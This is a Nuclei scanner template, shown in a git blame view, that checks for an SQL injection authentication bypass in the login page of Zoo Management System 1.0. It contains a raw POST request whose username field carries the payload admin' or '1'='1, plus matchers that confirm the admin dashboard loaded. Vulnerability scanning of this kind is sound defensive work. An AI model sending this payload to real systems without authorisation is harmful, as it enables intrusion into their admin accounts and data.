nuclei-templates/vulnerabilities/other/zms-sqli.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-07-25 18:17:14 +00:00
id: zms-sqli
info:
name: Zoo Management System 1.0 - SQL Injection
2022-07-25 18:17:14 +00:00
author: arafatansari
severity: critical
2022-07-25 18:17:14 +00:00
description: |
Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-25 18:17:14 +00:00
reference:
- https://www.exploit-db.com/exploits/48880
- https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-07-26 04:35:07 +00:00
metadata:
verified: true
tags: edb,packetstorm,zms,sqli,auth-bypass,cms
2022-07-25 18:17:14 +00:00
requests:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271&password=any&login=
host-redirects: true
2022-07-25 18:17:14 +00:00
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-25 18:25:18 +00:00
- 'ZMS ADMIN'
2022-07-25 18:20:46 +00:00
- 'Dashboard'
2022-07-25 18:17:14 +00:00
- 'Zoo Management System'
2022-07-25 18:25:18 +00:00
condition: and
2022-07-25 18:17:14 +00:00
- type: status
status:
2022-07-25 18:20:46 +00:00
- 200
# Enhanced by mp on 2022/09/28